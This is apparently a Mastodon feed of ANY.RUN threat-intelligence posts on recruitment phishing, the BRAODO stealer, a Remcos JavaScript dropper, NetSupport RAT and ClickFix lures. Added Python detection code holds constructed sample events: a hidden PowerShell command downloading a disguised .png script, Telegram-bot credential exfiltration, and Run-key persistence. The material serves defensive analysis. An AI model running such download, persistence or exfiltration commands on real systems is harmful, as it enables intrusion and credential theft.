#anyrun

💼 Recruitment-Themed #Phishing Campaigns Target Facebook Users.
🚨 A new wave of phishing attacks is targeting job seekers with fake job offers impersonating brands like Red Bull, Tesla, Meta AI, and others. Attackers use #spearphishing emails to lure victims into applying for fictional positions by logging in via Facebook. These campaigns often spoof legitimate recruitment platforms like indeed[.]com using #typosquatted domains.

👨‍💻 See analysis sessions:
Porsche: app.any.run/tasks/cce7aac5-0ce
Tesla: app.any.run/tasks/1ec08aeb-908
Red Bull: app.any.run/tasks/7360ea7f-049

⚠️ Even though the pages mimic legitimate job platforms, several red flags expose #malicious behavior:
🔹 No redirection to Facebook’s official SSO
🔹 IP fingerprinting via services like ipapi and ipify
🔹 In some cases, exfiltration of credentials using socket[.]io and attacker-controlled Telegram bots
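As an added illustration (not code from the post or from ANY.RUN), the checker below applies these three red flags to sandbox-style network events: the lookup and exfiltration hostnames come from the post, while the event format, the Facebook SSO allow-list and the sample events are constructed assumptions.

```python
import re
from urllib.parse import urlparse

# Hostnames named in the post; the Facebook SSO allow-list is an assumption.
FINGERPRINT_HOSTS = {"ipapi.co", "api.ipify.org"}
TELEGRAM_API_HOST = "api.telegram.org"
FACEBOOK_SSO_HOSTS = {"facebook.com", "www.facebook.com", "m.facebook.com"}

def _host(url):
    return (urlparse(url).hostname or "").lower()

def _is_credential_post(method, fields):
    """Treat a POST that carries a password-like field as a login submission."""
    if method != "POST" or not fields:
        return False
    return any(re.search(r"pass|pwd", key, re.I) for key in fields)

def analyze(events):
    """Return the set of red flags seen in (method, url, form_fields) events."""
    flags = set()
    for method, url, fields in events:
        host, path = _host(url), urlparse(url).path
        if host in FINGERPRINT_HOSTS:                      # client IP lookup
            flags.add("ip_fingerprinting")
        if _is_credential_post(method, fields) and host not in FACEBOOK_SSO_HOSTS:
            flags.add("login_not_facebook_sso")           # creds go to the kit, not SSO
        if "/socket.io/" in path and host not in FACEBOOK_SSO_HOSTS:
            flags.add("socketio_exfil_channel")           # WebSocket back-channel
        if host == TELEGRAM_API_HOST and re.match(r"^/bot[^/]+/sendMessage", path):
            flags.add("telegram_bot_exfil")               # Bot API used as a drop
    return flags

# Constructed events resembling the fake-recruitment flow described above.
PHISH_EVENTS = [
    ("GET", "https://fake-recruit.example/apply", None),
    ("GET", "https://api.ipify.org/?format=json", None),
    ("GET", "https://ipapi.co/json/", None),
    ("POST", "https://fake-recruit.example/login.php", {"email": "a@b.example", "pass": "x"}),
    ("GET", "wss://fake-recruit.example/socket.io/?EIO=4&transport=websocket", None),
    ("POST", "https://api.telegram.org/bot<token-placeholder>/sendMessage", {"text": "..."}),
]
# Constructed benign flow: the login form is submitted to Facebook itself.
BENIGN_EVENTS = [
    ("GET", "https://careers.example/jobs", None),
    ("POST", "https://www.facebook.com/login.php", {"email": "a@b.example", "pass": "x"}),
]
```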

🔍 Search for Red Bull-themed recruitment phishing using TI Lookup:
intelligence.any.run/analysis/

Another observed trend includes the abuse of indeed[.]com through #typosquatting: lndeed[.]com. See example: app.any.run/tasks/fce3c537-de6

🔍 Find more typosquatted domains using this TI Lookup request:
intelligence.any.run/analysis/

🔗 Execution chain:
Phishing email or link ➡️ Fake job offer ➡️ Fake Facebook login form ➡️ Credentials & IP exfiltration via WebSocket or Telegram bot

🛡️ Recommendation for users and organizations:
🔹 Always enable 2FA
🔹 Cross-check job offers on official company websites
🔹 Avoid disclosing PII unless interacting via verified recruiting platforms like LinkedIn or Indeed

#IOCs:

🚀 Use #ANYRUN Interactive Sandbox to analyze suspicious emails and URLs, extract #IOCs, and uncover hidden network activity, such as external IP gathering.

🎯 Registry abuse helps #malware maintain persistence and stealth on infected endpoints.
Detonating suspicious files in #ANYRUN Sandbox gives instant visibility into registry activity.

Explore examples, featuring #FormBook and script-based attacks 👇
any.run/cybersecurity-blog/how

#cybersecurity #infosec

🎙️ Watch Live: Fast Threat Detection and Hands-On Training with #ANYRUN

Join our first livestream with Level Effect to sharpen your skills and see ANYRUN in action
📅 June 25, 11 A.M. EST

YouTube: youtube.com/live/tH7-4XFWPk0
Twitch: twitch.tv/leveleffect

🎯 Proactive threat monitoring just got easier with TAXII support in #ANYRUN's TI Feeds.

Access actionable #IOCs from investigations across 15,000 organizations, export via API or SDK in STIX & MISP formats and easily integrate into your #SOC tools 👇
any.run/cybersecurity-blog/tax

#infosec #cybersecurity

👨‍💻 Faster triage, incident response, and better threat visibility. #ANYRUN helps #SOC teams handle advanced threats with speed and precision.

Use the action plan from our webinar to streamline your investigations and workflows: youtu.be/pS-vw_J3xn8?si=uUNrD8

🚨 #BRAODO Stealer Abuses GitHub for Payload Staging and Hosting.
⚠️ A new campaign distributing this #malware leverages a public #GitHub repository, including raw file content, to host payloads. The primary goal of this stealer is data exfiltration, and at the time of analysis, its detection rate was low. The #BAT files used in the campaign include misleading comments to complicate analysis.

👨‍💻 #ANYRUN’s Script Tracer simplifies the process by logging the multi-stage execution flow step by step, without the need for manual deobfuscation. Let’s take a closer look at this threat’s behavior using #ANYRUN Interactive Sandbox, which provides full visibility into process activity and persistence mechanisms.

🔗 Execution chain:
BAT ➡️ CMD ➡️ #PowerShell ➡️ BAT ➡️ PowerShell ➡️ Python (🚨 BRAODO Stealer)

Analysis session: app.any.run/tasks/75be7fd8-898

⚠️ The first BAT file executes a CMD command that launches PowerShell in hidden mode to avoid displaying a visible window. It then downloads a second BAT file from github[.]com, disguised as a .PNG file, saves it to the %temp% folder, and executes it.

The second BAT file launches a new PowerShell script that removes components from the earlier stages, enforces TLS 1.2, retrieves an additional payload from raw.githubusercontent[.]com and saves it in the Startup folder, and downloads the main payload as a ZIP file.

🚨 The final payload, BRAODO Stealer, is extracted from a ZIP file, stored in the Public directory and executed using python.exe. After execution, it deletes the initial archive to reduce artifacts.

The Python file is obfuscated with pyobfuscate and contains non-encrypted, custom Base64-encoded payload strings appended to the script.

🚀 Use #ANYRUN Interactive Sandbox to trace every step, extract #IOCs, and understand how obfuscated multi-layer payloads behave in real environments.

🏛️ Government agencies use #ANYRUN for faster threat detection, investigation, and mitigation

See how our solutions help analyze and respond to threats targeting organizations, with real-world cases like the attack on US Social Security Administration 👇
any.run/cybersecurity-blog/how

#cybersecurity #infosec

⚠️ Modern SOCs face nonstop threats, alert fatigue, and pressure to respond fast
🔍 Find out how #ANYRUN's feeds, offering fresh #IOCs from threats across 15k businesses, can level up your ability to monitor, detect, and mitigate incidents: any.run/cybersecurity-blog/thr

Do you use TI feeds in your SOC workflow?

#threatintel #ThreatIntelligence #cybersecurity

🚀 You now can integrate #ANYRUN's Threat Intelligence Feeds via #TAXII protocol.

Learn how you can use this fast and secure way to receive our fresh, uniquely sourced network #IOCs for proactive monitoring and detection ⬇️
any.run/cybersecurity-blog/tax

🚨 Control-Flow Flattening Obfuscated #JavaScript Drops #Remcos.
⚠️ The observed JS contains multiple self-invoking functions that loop arrays of strings and numbers in a while(!![]) loop until a calculated checksum matches a predefined value. This #obfuscation technique forces static analyzers to parse through the array content instead of returning the required string directly.

🎯 #ANYRUN’s Script Tracer enables easy analysis of heavily obfuscated scripts by logging their execution in real time, with no need for manual deobfuscation.

🔗 Execution chain:
#Wscript (JavaScript) ➡️ PowerShell ➡️ MSBuild (Remcos 🚨)

👨‍💻 See analysis session: app.any.run/tasks/eaef10ea-356

This script invokes #PowerShell using ActiveXObject("WScript.Shell") with parameters and executes the following:
🔹 Creates a System.Net.WebClient object
🔹 Specifies the URL to download the binary
🔹 Downloads the binary data and passes it to #MSBuild

⚠️ As a result, the script downloads and executes the Remcos #malware module.
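An added triage example, not code from the post or from ANY.RUN: a regex scanner for the markers described above (the while(!![]) rotation loop with a parseInt checksum over a string array, and the WScript.Shell / WebClient / MSBuild hand-off), run over a constructed snippet that reproduces only those markers; the marker regexes and thresholds are assumptions.

```python
import re

# Regex markers for the pattern described above (constructed triage heuristics,
# not ANY.RUN signatures). The loop, the checksum and the rotation together are
# what distinguish control-flow flattening from ordinary loops.
MARKERS = {
    "while_truthy_loop": r"while\s*\(\s*!\s*!\s*\[\s*\]\s*\)",                   # while(!![])
    "parseint_checksum": r"parseInt\s*\([^)]*\)\s*/\s*\d+",                      # parseInt(..)/n
    "array_rotation": r"push\W{0,3}\(\s*\w+\W{0,3}shift\W{0,3}\(\s*\)\s*\)",      # a.push(a.shift())
    "string_array": r"\[\s*(?:['\"][^'\"]*['\"]\s*,\s*){4,}['\"][^'\"]*['\"]\s*\]",
    "wscript_shell": r"WScript\.Shell",
    "webclient_download": r"System\.Net\.WebClient",
    "msbuild_handoff": r"\bMSBuild\b",
}

def scan(js):
    """Map each marker name to whether it occurs in the script text."""
    return {name: bool(re.search(pat, js)) for name, pat in MARKERS.items()}

def verdict(js):
    """Combine markers into a coarse classification."""
    h = scan(js)
    flattened = h["while_truthy_loop"] and h["parseint_checksum"] and h["array_rotation"]
    dropper = h["wscript_shell"] and (h["webclient_download"] or h["msbuild_handoff"])
    if flattened and dropper:
        return "flattened_script_dropper"
    if flattened:
        return "control_flow_flattening"
    return "no_match"

# Constructed snippet that reproduces only the markers (no live payload or URL).
FLATTENED_SAMPLE = r"""
var _0x1f = ['WScript.Shell', 'powershell', 'System.Net.WebClient', 'MSBuild', 'QUJD'];
(function (a, b) {
  var c = function (d) {
    while (!![]) {
      try {
        var e = parseInt('0x1a') / 1 + parseInt('0x2b') / 2;
        if (e === d) break; else a['push'](a['shift']());
      } catch (f) { a['push'](a['shift']()); }
    }
  };
  c(++b);
}(_0x1f, 0x12a3));
var sh = new ActiveXObject(_0x1f[0]);
"""
# Ordinary code that also uses parseInt and a while loop, but no rotation.
BENIGN_SAMPLE = "var n = parseInt(s) / 2; while (n > 0) { n--; }"
```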

👨‍💻 Observe obfuscated loaders, explore execution flows, and extract behavioral indicators in real time. Improve your security operations with #ANYRUN Sandbox.

2025-06-11

Beware of "sandbox terrorists"

Imagine: you are a developer of commercial software. One fine day, users start reporting that the popular blocker uBlock Origin won't let them download your product. There are no ads or third-party banners in the application, and there never have been. Impossible? Yesterday we ran into exactly such a targeted attack on our reputation. Under the cut: intrigue, an investigation, the anatomy of the attack, and conclusions that could save your project too.

habr.com/ru/articles/917702/

#anyrun #antivirus #spamhaus #dynamic_code_analysis #sandbox #malware #malware_analysis #reputation_attack

🎯 Threat Intelligence Feeds play a major role in #SOC performance.

🔍 Find out how #ANYRUN's feeds, offering fresh #IOCs from threats across 15k businesses, can level up your ability to monitor, detect, and mitigate incidents.
any.run/cybersecurity-blog/thr

🚀 From faster alert triage and incident response to better threat visibility, #ANYRUN helps #SOCs save time and effort across different day-to-day operations.

Your team can benefit too. Just use the action plan from our recent webinar ⬇️
any.run/cybersecurity-blog/act

#infosec #cybersecurity

👨‍💻 #Malware analysis starts with choosing the right OS. With #Android OS support, SOC teams using #ANYRUN now have the flexibility to investigate a greater variety of malware samples, extending analysis to mobile file types.

Check out the full guide to analyzing threats across platforms:
any.run/cybersecurity-blog/how

Which type of threats do you analyze most frequently?

🚨 #Obfuscated BAT file used to deliver NetSupport RAT

At the time of the analysis, the sample had not yet been submitted to #VirusTotal ⚠️

👨‍💻 See sandbox session: app.any.run/tasks/db6fcb53-6f1

🔗 Execution chain:
cmd.exe (BAT) ➡️ #PowerShell ➡️ PowerShell ➡️ #client32.exe (NetSupport client) ➡️ reg.exe

Key details:
🔹 Uses a 'client32' process to run #NetSupport #RAT and add it to autorun in registry via reg.exe
🔹 Creates an 'Options' folder in %APPDATA% if missing
🔹 NetSupport client downloads a task .zip file, extracts, and runs it from %APPDATA%\Application .zip
🔹 Deletes ZIP files after execution
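An added example serving this post and the #BRAODO post above (not ANY.RUN's own behavior signatures): a small Python rule set over constructed sandbox-style process and file events that flags the behaviours the two chains describe, namely hidden PowerShell spawned by cmd.exe, a GitHub .PNG download saved as a script, a Startup-folder write, reg.exe Run-key persistence, execution from Public or AppData, and post-run ZIP deletion. The event format, paths, value names and sample traces are assumptions.

```python
import re

# Constructed heuristics for the BAT-dropper chains in this post and the BRAODO
# post above; they are illustrative, not ANY.RUN's own behavior signatures.
def P(image, parent, cmdline): return {"type": "process", "image": image, "parent": parent, "cmdline": cmdline}
def F(op, path): return {"type": "file", "op": op, "path": path}

PROC_RULES = [
    ("hidden_powershell_from_cmd", lambda e: e["image"] == "powershell.exe" and e["parent"] == "cmd.exe"
        and re.search(r"-w(indowstyle)?\s+hidden", e["cmdline"], re.I)),
    ("github_download_extension_mismatch", lambda e:  # .png fetched from GitHub, saved as a script
        re.search(r"https?://(raw\.githubusercontent|github)\.com/\S+\.png", e["cmdline"], re.I)
        and re.search(r"\.(bat|cmd|ps1)\b", e["cmdline"], re.I)),
    ("run_key_autorun_via_reg", lambda e: e["image"] == "reg.exe"
        and re.search(r"\badd\b.*\\CurrentVersion\\Run\b", e["cmdline"], re.I)),
    ("payload_from_public_or_appdata", lambda e: e["image"] in ("python.exe", "client32.exe")
        and re.search(r"\\Users\\(Public|[^\\]+\\AppData)\\", e["cmdline"], re.I)),
]
FILE_RULES = [
    ("startup_folder_write", lambda e: e["op"] == "write" and re.search(r"\\Startup\\", e["path"], re.I)),
    ("archive_deleted_after_run", lambda e: e["op"] == "delete" and e["path"].lower().endswith(".zip")),
]

def evaluate(events):
    """Return the rule names hit, in first-seen order, for sandbox-style events."""
    hits = []
    for e in events:
        for name, test in (PROC_RULES if e["type"] == "process" else FILE_RULES):
            if test(e) and name not in hits:
                hits.append(name)
    return hits

# Constructed event traces modelled on the two execution chains described above.
TMP = r"C:\Users\victim\AppData\Local\Temp"
BRAODO_EVENTS = [
    P("powershell.exe", "cmd.exe", "powershell.exe -w hidden -c (New-Object Net.WebClient)"
      ".DownloadFile('https://github.com/placeholder/repo/raw/stage.png','" + TMP + r"\stage.bat')"),
    F("write", r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\run.ps1"),
    P("python.exe", "powershell.exe", r"C:\Users\Public\py\python.exe C:\Users\Public\main.py"),
    F("delete", r"C:\Users\Public\payload.zip"),
]
NETSUPPORT_EVENTS = [
    P("powershell.exe", "cmd.exe", "powershell.exe -File " + TMP + r"\stage.ps1"),
    P("client32.exe", "powershell.exe", r"C:\Users\victim\AppData\Roaming\Options\client32.exe"),
    P("reg.exe", "client32.exe", r"reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
      r" /v client32 /t REG_SZ /d C:\Users\victim\AppData\Roaming\Options\client32.exe"),
    F("delete", r"C:\Users\victim\AppData\Roaming\task.zip"),
]
```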

❗️ BAT droppers remain a common choice in attacks as threat actors continue to find new methods to evade detection.

Use #ANYRUN’s Interactive Sandbox to quickly trace the full execution chain and uncover #malware behavior for fast and informed response.

#cybersecurity #infosec

🚀 In May, #ANYRUN got another threat detection boost with 900+ new behavior signatures, #YARA and #Suricata rules.

We also redesigned the onboarding tutorial and added TAXII support for TI Feeds 🔍

👨‍💻 Check out and explore all updates: any.run/cybersecurity-blog/rel

2025-06-04

Cyber Attacks on Government Agencies: Detect and Investigate

This analysis examines cyber threats targeting government institutions worldwide, focusing on three case studies: a phishing email targeting the South Carolina Department of Employment and Workforce, a fraudulent domain mimicking the U.S. Social Security Administration, and a malicious PDF posing as a South African Judiciary notice. The study demonstrates how ANY.RUN's solutions, including Threat Intelligence Lookup, Interactive Sandbox, and YARA Search, can be utilized to detect, analyze, and mitigate these threats. Key findings include the use of FormBook stealer, remote access tools, and credential harvesting techniques. The analysis provides actionable insights for government cybersecurity teams to enhance their defensive strategies and response capabilities.

Pulse ID: 68409d6271a2178e01aa5e79
Pulse Link: otx.alienvault.com/pulse/68409
Pulse Author: AlienVault
Created: 2025-06-04 19:24:18

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#ANYRUN #Africa #CredentialHarvesting #CyberAttack #CyberAttacks #CyberSecurity #Email #FormBook #Government #InfoSec #Mimic #OTX #OpenThreatExchange #PDF #Phishing #RAT #RCE #bot #AlienVault

☀️ Summer is Here and So Are Fake Bookings 🎣
🚨 #Phishing emails disguised as #booking confirmations are heating up during this summer travel season, using #ClickFix techniques to deliver #malware.
Fake Booking.com emails typically request payment confirmation or additional service fees, urging victims to interact with malicious payloads.
👨‍💻 Fake payment form analysis session: app.any.run/tasks/84cffd74-ab8

🔍 A quick search in Threat Intelligence Lookup reveals a clear spike in activity during May-June. Use this search request to find related domains, IPs, and sandbox analysis sessions:
intelligence.any.run/analysis/

Most recent samples use ClickFix, a #fakecaptcha where the victim is tricked into copy-pasting and running a #PowerShell downloader via terminal.
👨‍💻 ClickFix analysis session: app.any.run/tasks/2e5679ef-1b4

The downloaded executables belong to the #RAT malware families, giving attackers full remote access to infected systems.

❗️ How to stay safe from seasonal phishing threats during your vacation:
1️⃣ Validate sender domains. Emails from trusted booking providers, hotels, and airlines typically come from official domains such as @booking.com, @airline.com

2️⃣ Analyze suspicious files with #ANYRUN. Use #ANYRUN’s interactive sandbox to quickly detect threats, safely detonate phishing URLs, and observe malicious behavior in a controlled environment.

3️⃣ Only enter your personal data on trusted websites. Look for a valid HTTPS certificate and double-check that the site belongs to the real service.

4️⃣ Train staff on phishing and brand impersonation tactics, especially during peak travel periods.

🏝️ Have a safe and sweet vacation!

🏛️ Government agencies use #ANYRUN to detect and investigate #phishing for faster response and mitigation.

See how with analysis of real-world #cyberattacks on US Social Security Administration and others ⬇️
any.run/cybersecurity-blog/how

👨‍💻 #ANYRUN's Threat Intelligence Feeds include #IOCs, IOBs, and IOAs from the latest attacks on 15,000 organizations.

🔍 Discover how integrating them can improve threat detection and help your business meet key security KPIs: any.run/cybersecurity-blog/red

#threatintel #cybersecurity #infosec

Client Info

Server: https://mastodon.social
Version: 2025.04
Repository: https://github.com/cyevgeniy/lmst